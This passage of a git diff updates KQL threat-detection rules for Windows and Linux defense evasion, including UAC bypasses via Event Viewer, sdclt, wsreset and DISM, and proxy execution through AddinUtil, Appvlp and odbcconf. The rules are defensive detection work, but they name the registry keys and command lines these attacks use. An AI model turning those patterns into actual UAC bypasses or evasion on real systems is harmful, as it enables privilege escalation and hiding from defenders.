 | where (ProcessCommandLine endswith "\\AppData\\Local\\Temp\\update.msu" and ProcessCommandLine startswith "\"C:\\Windows\\system32\\wusa.exe\" /quiet C:\\Users\\" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288"))) or ((ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Temp\\" and ProcessCommandLine contains "\\dismhost.exe {") and FolderPath endswith "\\DismHost.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine =~ "\"C:\\Windows\\system32\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\Windows\\system32\\pe386\" /ignorecheck")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_pkgmgr_and_dism.kql b/KQL/rules/Defense Evasion/uac_bypass_using_pkgmgr_and_dism.kql
index 049383b1..07e62c6d 100644
--- a/KQL/rules/Defense Evasion/uac_bypass_using_pkgmgr_and_dism.kql
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_pkgmgr_and_dism.kql
@@ -1,10 +1,10 @@
-// Title: UAC Bypass Using PkgMgr and DISM
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021-08-23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
-
-DeviceProcessEvents
+// Title: UAC Bypass Using PkgMgr and DISM
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
 | where FolderPath endswith "\\dism.exe" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessFolderPath endswith "\\pkgmgr.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_file.kql b/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_file.kql
index 15db9392..de70bf24 100644
--- a/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_file.kql
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_file.kql
@@ -1,10 +1,10 @@
-// Title: UAC Bypass Using Windows Media Player - File
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021-08-23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
-
-DeviceFileEvents
+// Title: UAC Bypass Using Windows Media Player - File
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceFileEvents
 | where (FolderPath endswith "\\AppData\\Local\\Temp\\OskSupport.dll" and FolderPath startswith "C:\\Users\\") or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\DllHost.exe" and FolderPath =~ "C:\\Program Files\\Windows Media Player\\osk.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_process.kql b/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_process.kql
index 2e3560fd..9debdadf 100644
--- a/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_process.kql
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_process.kql
@@ -1,10 +1,10 @@
-// Title: UAC Bypass Using Windows Media Player - Process
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021-08-23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
-
-DeviceProcessEvents
+// Title: UAC Bypass Using Windows Media Player - Process
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
 | where (FolderPath =~ "C:\\Program Files\\Windows Media Player\\osk.exe" or (FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and InitiatingProcessCommandLine =~ "\"C:\\Windows\\system32\\mmc.exe\" \"C:\\Windows\\system32\\eventvwr.msc\" /s")) and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_registry.kql b/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_registry.kql
index 87e58977..a46ce362 100644
--- a/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_registry.kql
+++ b/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_registry.kql
@@ -1,10 +1,10 @@
-// Title: UAC Bypass Using Windows Media Player - Registry
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021-08-23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
-
-DeviceRegistryEvents
+// Title: UAC Bypass Using Windows Media Player - Registry
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "Binary Data" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Compatibility Assistant\\Store\\C:\\Program Files\\Windows Media Player\\osk.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_via_event_viewer.kql b/KQL/rules/Defense Evasion/uac_bypass_via_event_viewer.kql
index d3e1ed50..89695cef 100644
--- a/KQL/rules/Defense Evasion/uac_bypass_via_event_viewer.kql
+++ b/KQL/rules/Defense Evasion/uac_bypass_via_event_viewer.kql
@@ -1,10 +1,10 @@
-// Title: UAC Bypass via Event Viewer
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017-03-19
-// Level: high
-// Description: Detects UAC bypass method using Windows event viewer
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, car.2019-04-001
-
-DeviceRegistryEvents
+// Title: UAC Bypass via Event Viewer
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-03-19
+// Level: high
+// Description: Detects UAC bypass method using Windows event viewer
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, car.2019-04-001
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\mscfile\\shell\\open\\command"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_via_icmluautil.kql b/KQL/rules/Defense Evasion/uac_bypass_via_icmluautil.kql
index 1e0a1a80..2a2b169a 100644
--- a/KQL/rules/Defense Evasion/uac_bypass_via_icmluautil.kql
+++ b/KQL/rules/Defense Evasion/uac_bypass_via_icmluautil.kql
@@ -1,10 +1,10 @@
-// Title: UAC Bypass via ICMLuaUtil
-// Author: Florian Roth (Nextron Systems), Elastic (idea)
-// Date: 2022-09-13
-// Level: high
-// Description: Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
-
-DeviceProcessEvents
+// Title: UAC Bypass via ICMLuaUtil
+// Author: Florian Roth (Nextron Systems), Elastic (idea)
+// Date: 2022-09-13
+// Level: high
+// Description: Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
 | where ((InitiatingProcessCommandLine contains "/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" or InitiatingProcessCommandLine contains "/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}") and InitiatingProcessFolderPath endswith "\\dllhost.exe") and (not((FolderPath endswith "\\WerFault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_via_sdclt.kql b/KQL/rules/Defense Evasion/uac_bypass_via_sdclt.kql
index 65b1bdbd..eea2b462 100644
--- a/KQL/rules/Defense Evasion/uac_bypass_via_sdclt.kql
+++ b/KQL/rules/Defense Evasion/uac_bypass_via_sdclt.kql
@@ -1,10 +1,10 @@
-// Title: UAC Bypass via Sdclt
-// Author: Omer Yampel, Christian Burkard (Nextron Systems)
-// Date: 2017-03-17
-// Level: high
-// Description: Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, car.2019-04-001
-
-DeviceRegistryEvents
+// Title: UAC Bypass via Sdclt
+// Author: Omer Yampel, Christian Burkard (Nextron Systems)
+// Date: 2017-03-17
+// Level: high
+// Description: Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, car.2019-04-001
+
+DeviceRegistryEvents
 | where RegistryKey endswith "Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand" or (RegistryValueData matches regex "-1[0-9]{3}\\\\Software\\\\Classes\\\\" and RegistryKey endswith "Software\\Classes\\Folder\\shell\\open\\command\\SymbolicLinkValue")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_via_windows_firewall_snap_in_hijack.kql b/KQL/rules/Defense Evasion/uac_bypass_via_windows_firewall_snap_in_hijack.kql
index dac64381..14419adc 100644
--- a/KQL/rules/Defense Evasion/uac_bypass_via_windows_firewall_snap_in_hijack.kql
+++ b/KQL/rules/Defense Evasion/uac_bypass_via_windows_firewall_snap_in_hijack.kql
@@ -1,10 +1,10 @@
-// Title: UAC Bypass via Windows Firewall Snap-In Hijack
-// Author: Tim Rauch, Elastic (idea)
-// Date: 2022-09-27
-// Level: medium
-// Description: Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548
-
-DeviceProcessEvents
+// Title: UAC Bypass via Windows Firewall Snap-In Hijack
+// Author: Tim Rauch, Elastic (idea)
+// Date: 2022-09-27
+// Level: medium
+// Description: Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548
+
+DeviceProcessEvents
 | where (InitiatingProcessCommandLine contains "WF.msc" and InitiatingProcessFolderPath endswith "\\mmc.exe") and (not(FolderPath endswith "\\WerFault.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_via_wsreset.kql b/KQL/rules/Defense Evasion/uac_bypass_via_wsreset.kql
index bb229670..0d445fd2 100644
--- a/KQL/rules/Defense Evasion/uac_bypass_via_wsreset.kql
+++ b/KQL/rules/Defense Evasion/uac_bypass_via_wsreset.kql
@@ -1,10 +1,10 @@
-// Title: UAC Bypass Via Wsreset
-// Author: oscd.community, Dmitry Uchakin
-// Date: 2020-10-07
-// Level: high
-// Description: Unfixed method for UAC bypass from Windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
-
-DeviceRegistryEvents
+// Title: UAC Bypass Via Wsreset
+// Author: oscd.community, Dmitry Uchakin
+// Date: 2020-10-07
+// Level: high
+// Description: Unfixed method for UAC bypass from Windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_wsreset.kql b/KQL/rules/Defense Evasion/uac_bypass_wsreset.kql
index c2371ce2..c7cb0138 100644
--- a/KQL/rules/Defense Evasion/uac_bypass_wsreset.kql
+++ b/KQL/rules/Defense Evasion/uac_bypass_wsreset.kql
@@ -1,10 +1,10 @@
-// Title: UAC Bypass WSReset
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021-08-23
-// Level: high
-// Description: Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
-
-DeviceProcessEvents
+// Title: UAC Bypass WSReset
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
 | where FolderPath endswith "\\wsreset.exe" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/ufw_force_stop_using_ufw_init.kql b/KQL/rules/Defense Evasion/ufw_force_stop_using_ufw_init.kql
index 94f1016a..53d35b3e 100644
--- a/KQL/rules/Defense Evasion/ufw_force_stop_using_ufw_init.kql
+++ b/KQL/rules/Defense Evasion/ufw_force_stop_using_ufw_init.kql
@@ -1,12 +1,12 @@
-// Title: Ufw Force Stop Using Ufw-Init
-// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
-// Date: 2023-01-18
-// Level: medium
-// Description: Detects attempts to force stop the ufw using ufw-init
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.004
-// False Positives:
-// - Network administrators
-
-DeviceProcessEvents
+// Title: Ufw Force Stop Using Ufw-Init
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-01-18
+// Level: medium
+// Description: Detects attempts to force stop the ufw using ufw-init
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.004
+// False Positives:
+// - Network administrators
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-ufw-init" and ProcessCommandLine contains "force-stop") or (ProcessCommandLine contains "ufw" and ProcessCommandLine contains "disable")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uncommon_addinutil_exe_commandline_execution.kql b/KQL/rules/Defense Evasion/uncommon_addinutil_exe_commandline_execution.kql
index 7dc6f0b7..4a68b3dd 100644
--- a/KQL/rules/Defense Evasion/uncommon_addinutil_exe_commandline_execution.kql
+++ b/KQL/rules/Defense Evasion/uncommon_addinutil_exe_commandline_execution.kql
@@ -1,10 +1,10 @@
-// Title: Uncommon AddinUtil.EXE CommandLine Execution
-// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
-// Date: 2023-09-18
-// Level: medium
-// Description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-
-DeviceProcessEvents
+// Title: Uncommon AddinUtil.EXE CommandLine Execution
+// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
+// Date: 2023-09-18
+// Level: medium
+// Description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "-AddInRoot:" or ProcessCommandLine contains "-PipelineRoot:") and (FolderPath endswith "\\addinutil.exe" or ProcessVersionInfoOriginalFileName =~ "AddInUtil.exe")) and (not((ProcessCommandLine contains "-AddInRoot:\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA" or ProcessCommandLine contains "-AddInRoot:C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA" or ProcessCommandLine contains "-PipelineRoot:\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA" or ProcessCommandLine contains "-PipelineRoot:C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uncommon_assistive_technology_applications_execution_via_atbroker_exe.kql b/KQL/rules/Defense Evasion/uncommon_assistive_technology_applications_execution_via_atbroker_exe.kql
index 7b568e30..95871c9b 100644
--- a/KQL/rules/Defense Evasion/uncommon_assistive_technology_applications_execution_via_atbroker_exe.kql
+++ b/KQL/rules/Defense Evasion/uncommon_assistive_technology_applications_execution_via_atbroker_exe.kql
@@ -1,12 +1,12 @@
-// Title: Uncommon Assistive Technology Applications Execution Via AtBroker.EXE
-// Author: Mateusz Wydra, oscd.community
-// Date: 2020-10-12
-// Level: medium
-// Description: Detects the start of a non built-in assistive technology applications via "Atbroker.EXE".
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-// False Positives:
-// - Legitimate, non-default assistive technology applications execution
-
-DeviceProcessEvents
+// Title: Uncommon Assistive Technology Applications Execution Via AtBroker.EXE
+// Author: Mateusz Wydra, oscd.community
+// Date: 2020-10-12
+// Level: medium
+// Description: Detects the start of a non built-in assistive technology applications via "Atbroker.EXE".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate, non-default assistive technology applications execution
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "start" and (FolderPath endswith "\\AtBroker.exe" or ProcessVersionInfoOriginalFileName =~ "AtBroker.exe")) and (not((ProcessCommandLine contains "animations" or ProcessCommandLine contains "audiodescription" or ProcessCommandLine contains "caretbrowsing" or ProcessCommandLine contains "caretwidth" or ProcessCommandLine contains "colorfiltering" or ProcessCommandLine contains "cursorindicator" or ProcessCommandLine contains "cursorscheme" or ProcessCommandLine contains "filterkeys" or ProcessCommandLine contains "focusborderheight" or ProcessCommandLine contains "focusborderwidth" or ProcessCommandLine contains "highcontrast" or ProcessCommandLine contains "keyboardcues" or ProcessCommandLine contains "keyboardpref" or ProcessCommandLine contains "livecaptions" or ProcessCommandLine contains "magnifierpane" or ProcessCommandLine contains "messageduration" or ProcessCommandLine contains "minimumhitradius" or ProcessCommandLine contains "mousekeys" or ProcessCommandLine contains "Narrator" or 
ProcessCommandLine contains "osk" or ProcessCommandLine contains "overlappedcontent" or ProcessCommandLine contains "showsounds" or ProcessCommandLine contains "soundsentry" or ProcessCommandLine contains "speechreco" or ProcessCommandLine contains "stickykeys" or ProcessCommandLine contains "togglekeys" or ProcessCommandLine contains "voiceaccess" or ProcessCommandLine contains "windowarranging" or ProcessCommandLine contains "windowtracking" or ProcessCommandLine contains "windowtrackingtimeout" or ProcessCommandLine contains "windowtrackingzorder"))) and (not(ProcessCommandLine contains "Oracle_JavaAccessBridge"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uncommon_child_process_of_addinutil_exe.kql b/KQL/rules/Defense Evasion/uncommon_child_process_of_addinutil_exe.kql
index 0fdfd14b..802c5177 100644
--- a/KQL/rules/Defense Evasion/uncommon_child_process_of_addinutil_exe.kql
+++ b/KQL/rules/Defense Evasion/uncommon_child_process_of_addinutil_exe.kql
@@ -1,10 +1,10 @@
-// Title: Uncommon Child Process Of AddinUtil.EXE
-// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
-// Date: 2023-09-18
-// Level: medium
-// Description: Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-
-DeviceProcessEvents
+// Title: Uncommon Child Process Of AddinUtil.EXE
+// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
+// Date: 2023-09-18
+// Level: medium
+// Description: Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\addinutil.exe" and (not((FolderPath endswith ":\\Windows\\System32\\conhost.exe" or FolderPath endswith ":\\Windows\\System32\\werfault.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\werfault.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uncommon_child_process_of_appvlp_exe.kql b/KQL/rules/Defense Evasion/uncommon_child_process_of_appvlp_exe.kql
index 1d237a37..6a4b8721 100644
--- a/KQL/rules/Defense Evasion/uncommon_child_process_of_appvlp_exe.kql
+++ b/KQL/rules/Defense Evasion/uncommon_child_process_of_appvlp_exe.kql
@@ -1,13 +1,13 @@
-// Title: Uncommon Child Process Of Appvlp.EXE
-// Author: Sreeman
-// Date: 2020-03-13
-// Level: medium
-// Description: Detects uncommon child processes of Appvlp.EXE
-// Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands.
-// Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder
-// or to mark a file as a system file.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.t1218, attack.defense-evasion, attack.execution
-
-DeviceProcessEvents
+// Title: Uncommon Child Process Of Appvlp.EXE
+// Author: Sreeman
+// Date: 2020-03-13
+// Level: medium
+// Description: Detects uncommon child processes of Appvlp.EXE
+// Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands.
+// Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder
+// or to mark a file as a system file.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1218, attack.defense-evasion, attack.execution
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\appvlp.exe" and (not((FolderPath endswith ":\\Windows\\SysWOW64\\rundll32.exe" or FolderPath endswith ":\\Windows\\System32\\rundll32.exe"))) and (not(((FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath endswith "\\msoasb.exe") or (FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath endswith "\\MSOUC.EXE") or ((FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath contains "\\SkypeSrv\\") and FolderPath endswith "\\SKYPESERVER.EXE"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uncommon_child_process_of_defaultpack_exe.kql b/KQL/rules/Defense Evasion/uncommon_child_process_of_defaultpack_exe.kql
index b5a04ba0..7ea966da 100644
--- a/KQL/rules/Defense Evasion/uncommon_child_process_of_defaultpack_exe.kql
+++ b/KQL/rules/Defense Evasion/uncommon_child_process_of_defaultpack_exe.kql
@@ -1,10 +1,10 @@
-// Title: Uncommon Child Process Of Defaultpack.EXE
-// Author: frack113
-// Date: 2022-12-31
-// Level: medium
-// Description: Detects uncommon child processes of "DefaultPack.EXE" binary as a proxy to launch other programs
-// MITRE Tactic: Defense Evasion
-// Tags: attack.t1218, attack.defense-evasion, attack.execution
-
-DeviceProcessEvents
+// Title: Uncommon Child Process Of Defaultpack.EXE
+// Author: frack113
+// Date: 2022-12-31
+// Level: medium
+// Description: Detects uncommon child processes of "DefaultPack.EXE" binary as a proxy to launch other programs
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1218, attack.defense-evasion, attack.execution
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\DefaultPack.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uncommon_child_process_of_setres_exe.kql b/KQL/rules/Defense Evasion/uncommon_child_process_of_setres_exe.kql
index abbad71c..7a64a5d5 100644
--- a/KQL/rules/Defense Evasion/uncommon_child_process_of_setres_exe.kql
+++ b/KQL/rules/Defense Evasion/uncommon_child_process_of_setres_exe.kql
@@ -1,14 +1,14 @@
-// Title: Uncommon Child Process Of Setres.EXE
-// Author: @gott_cyber, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-12-11
-// Level: high
-// Description: Detects uncommon child process of Setres.EXE.
-// Setres.EXE is a Windows server only process and tool that can be used to set the screen resolution.
-// It can potentially be abused in order to launch any arbitrary file with a name containing the word "choice" from the current execution path.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218, attack.t1202
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Uncommon Child Process Of Setres.EXE
+// Author: @gott_cyber, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-11
+// Level: high
+// Description: Detects uncommon child process of Setres.EXE.
+// Setres.EXE is a Windows server only process and tool that can be used to set the screen resolution.
+// It can potentially be abused in order to launch any arbitrary file with a name containing the word "choice" from the current execution path.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.t1202
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (FolderPath contains "\\choice" and InitiatingProcessFolderPath endswith "\\setres.exe") and (not((FolderPath endswith "C:\\Windows\\System32\\choice.exe" or FolderPath endswith "C:\\Windows\\SysWOW64\\choice.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uncommon_child_process_spawned_by_odbcconf_exe.kql b/KQL/rules/Defense Evasion/uncommon_child_process_spawned_by_odbcconf_exe.kql
index 2299a635..d3f06a71 100644
--- a/KQL/rules/Defense Evasion/uncommon_child_process_spawned_by_odbcconf_exe.kql
+++ b/KQL/rules/Defense Evasion/uncommon_child_process_spawned_by_odbcconf_exe.kql
@@ -1,13 +1,13 @@
-// Title: Uncommon Child Process Spawned By Odbcconf.EXE
-// Author: Harjot Singh @cyb3rjy0t
-// Date: 2023-05-22
-// Level: medium
-// Description: Detects an uncommon child process of "odbcconf.exe" binary which normally shouldn't have any child processes.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.008
-// False Positives:
-// - In rare occurrences where "odbcconf" crashes. It might spawn a "werfault" process
-// - Other child processes will depend on the DLL being registered by actions like "regsvr". In case where the DLLs have external calls (which should be rare). Other child processes might spawn and additional filters need to be applied.
-
-DeviceProcessEvents
+// Title: Uncommon Child Process Spawned By Odbcconf.EXE
+// Author: Harjot Singh @cyb3rjy0t
+// Date: 2023-05-22
+// Level: medium
+// Description: Detects an uncommon child process of "odbcconf.exe" binary which normally shouldn't have any child processes.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.008
+// False Positives:
+// - In rare occurrences where "odbcconf" crashes. It might spawn a "werfault" process
+// - Other child processes will depend on the DLL being registered by actions like "regsvr". In case where the DLLs have external calls (which should be rare). Other child processes might spawn and additional filters need to be applied.
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\odbcconf.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql b/KQL/rules/Defense Evasion/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql
index 86cac343..689ef8d5 100644
--- a/KQL/rules/Defense Evasion/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql
+++ b/KQL/rules/Defense Evasion/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql
@@ -1,14 +1,14 @@
-// Title: Uncommon Extension In Keyboard Layout IME File Registry Value
-// Author: X__Junior (Nextron Systems)
-// Date: 2023-11-21
-// Level: high
-// Description: Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message.
-// Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path.
-// IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
-
-DeviceRegistryEvents
+// Title: Uncommon Extension In Keyboard Layout IME File Registry Value
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-11-21
+// Level: high
+// Description: Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message.
+// Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path.
+// IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
